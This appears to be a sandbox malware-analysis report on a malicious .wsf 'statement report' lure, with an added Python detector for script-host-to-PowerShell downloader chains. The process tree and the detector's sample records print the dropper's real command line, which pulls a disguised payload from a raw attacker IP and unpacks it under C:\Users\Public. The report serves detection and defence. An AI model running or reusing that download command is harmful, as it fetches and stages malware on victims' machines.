Analysis
- max time kernel: 117s
- max time network: 117s
- platform: windows7_x64
- resource: win7-20231129-en
- resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
- submitted: 16-02-2024 21:24
Static task: static1
Behavioral task: behavioral1 (Sample: Scan001-StatementReport.wsf; Resource: win7-20231129-en, windows7-x64; 5 signatures; 150 seconds)
General
- Target: Scan001-StatementReport.wsf
- Size: 31KB
- MD5: 99ec5f8d2779e65e64c54265f8ee1547
- SHA1: 593116987bdd5119eceec7882c8fbd11fae139f2
- SHA256: 62edf192312ffa77440aaac0de4b693126e2c14e6a96c9764de45fc4ff6c2ef1
- SHA512: e39896113ea391097335b2c93d9d6dd76b255281c0aebc948c8a47ecd83fd7e1997ac224a30f108153b17d37f4fdd75dbce2a8d6ed9f5034af34293083cc4cbe
- SSDEEP: 768:Fs0IeoVcogHzATv4MR1b6rONCps0IeoVcogHzATv4MR1b6rONCD:pMXKceMXKcs
Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs: exe.dropper http://176.107.183.105:555/w.jpg
Signatures
- Blocklisted process makes network request (1 IoCs)
  Processes: flow 2, pid 1704, WScript.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes: pid 2244, powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: pid 2244, powershell.exe, Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: PID 1704 (WScript.exe) wrote to memory of PID 2244 (powershell.exe); the same parent/target pair is recorded three times
Processes
- C:\Windows\System32\WScript.exe (PID: 1704)
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Scan001-StatementReport.wsf"
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 2244, child of 1704)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://176.107.183.105:555/w.jpg' -Destination 'C:\Users\Public\ty.zip';Expand-Archive -Path 'C:\Users\Public\ty.zip' -DestinationPath 'C:\Users\Public\' -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
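The process tree above is the actionable part of this report: a script host (WScript.exe running the .wsf) spawns powershell.exe, which pulls a file named w.jpg from a raw IP on port 555 with Start-BitsTransfer, writes it to C:\Users\Public as ty.zip and immediately unpacks it with Expand-Archive. None of those indicators is conclusive on its own (administrators also use BITS), but together they are. The detection logic below is an added example, not part of this sandbox report or its tooling: it runs over constructed Sysmon Event ID 1-style process-creation records, two reconstructed from the tree above and one constructed benign record for contrast. The record field names, the root process's parent PID and the benign command line are assumptions.

```python
"""Score PowerShell process-creation events for the script-host -> BITS
download -> Expand-Archive pattern.  Added example for this page, not the
sandbox's own logic.  Record shape is modelled on Sysmon Event ID 1
(assumed field names); sample records are constructed below."""
import re
from dataclasses import dataclass
from ipaddress import ip_address
from urllib.parse import urlparse

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LURE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".txt"}   # disguise names
PAYLOAD_EXTS = {".zip", ".exe", ".dll", ".ps1", ".bat", ".vbs", ".js"}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
DEST_RE = re.compile(r"-Destination\s+['\"]([^'\"]+)['\"]", re.I)  # not -DestinationPath
BITS_RE = re.compile(r"\bStart-BitsTransfer\b", re.I)
EXPAND_RE = re.compile(r"\bExpand-Archive\b", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ext(path: str) -> str:
    name = _basename(path)
    return name[name.rfind("."):] if "." in name else ""


def analyze(ev: ProcEvent) -> list[str]:
    """Return the reasons a PowerShell event looks like a scripted downloader."""
    reasons: list[str] = []
    if _basename(ev.image) not in POWERSHELL:
        return reasons
    cl = ev.command_line
    if _basename(ev.parent_image) in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {_basename(ev.parent_image)}")
    if BITS_RE.search(cl):
        reasons.append("Start-BitsTransfer used from the command line")
    if BITS_RE.search(cl) and EXPAND_RE.search(cl):
        reasons.append("download chained with Expand-Archive in one command")
    dest = DEST_RE.search(cl)
    if dest and "\\users\\public\\" in dest.group(1).lower():
        reasons.append("payload staged under C:\\Users\\Public")
    for url in URL_RE.findall(cl):
        u = urlparse(url)
        host = u.hostname or ""
        try:
            ip_address(host)
            reasons.append(f"download from raw IP {host}")
        except ValueError:
            pass  # a hostname, not a literal address
        if u.port not in (None, 80, 443):
            reasons.append(f"non-standard port {u.port}")
        if dest and _ext(u.path) in LURE_EXTS and _ext(dest.group(1)) in PAYLOAD_EXTS:
            reasons.append(f"extension mismatch: {_ext(u.path)} fetched as {_ext(dest.group(1))}")
    return reasons


def is_malicious(ev: ProcEvent, threshold: int = 3) -> bool:
    """One weak indicator (an admin using BITS) is not enough; require several."""
    return len(analyze(ev)) >= threshold


def find_chains(events: list[ProcEvent]) -> list[tuple[int, int]]:
    """Resolve script-host -> PowerShell pairs by PID, not just the ParentImage string."""
    by_pid = {e.pid: e for e in events}
    chains = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and _basename(parent.image) in SCRIPT_HOSTS and _basename(e.image) in POWERSHELL:
            chains.append((parent.pid, e.pid))
    return chains


WS = r"C:\Windows\System32\WScript.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    # Reconstructed from the report's process tree; parent PID 1000 is assumed.
    ProcEvent(1704, 1000, WS, r"C:\Windows\explorer.exe",
              f'"{WS}" "C:\\Users\\Admin\\AppData\\Local\\Temp\\Scan001-StatementReport.wsf"'),
    ProcEvent(2244, 1704, PS, WS,
              f'"{PS}" '
              "Start-BitsTransfer -Source 'http://176.107.183.105:555/w.jpg' "
              "-Destination 'C:\\Users\\Public\\ty.zip';Expand-Archive -Path "
              "'C:\\Users\\Public\\ty.zip' -DestinationPath 'C:\\Users\\Public\\' -Force"),
    # Constructed benign contrast: an admin fetching a tool from a console session.
    ProcEvent(3100, 3000, PS, r"C:\Windows\System32\cmd.exe",
              "powershell.exe Start-BitsTransfer -Source 'https://downloads.example.com/tool.zip' "
              "-Destination 'C:\\Users\\Admin\\Downloads\\tool.zip'"),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev.pid, "MALICIOUS" if is_malicious(ev) else "ok", analyze(ev))
    print("script-host -> powershell chains:", find_chains(EVENTS))
```

The threshold matters: the benign record trips only the Start-BitsTransfer check, while the report's powershell.exe record trips all seven. In a real pipeline the URL and destination extraction should be applied to decoded -EncodedCommand payloads too, since the command line here happens to be in the clear.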
Network
MITRE ATT&CK Enterprise v15
Downloads
- memory/2244-7-0x000000001B930000-0x000000001BC12000-memory.dmp (Filesize: 2.9MB)
- memory/2244-8-0x0000000001E10000-0x0000000001E18000-memory.dmp (Filesize: 32KB)
- memory/2244-9-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp (Filesize: 9.6MB)
- memory/2244-10-0x0000000002FE0000-0x0000000003060000-memory.dmp (Filesize: 512KB)
- memory/2244-13-0x0000000002FE0000-0x0000000003060000-memory.dmp (Filesize: 512KB)
- memory/2244-15-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp (Filesize: 9.6MB)
- memory/2244-14-0x0000000002FE0000-0x0000000003060000-memory.dmp (Filesize: 512KB)
- memory/2244-12-0x0000000002FE4000-0x0000000002FE7000-memory.dmp (Filesize: 12KB)
- memory/2244-11-0x000007FEF59A0000-0x000007FEF633D000-memory.dmp (Filesize: 9.6MB)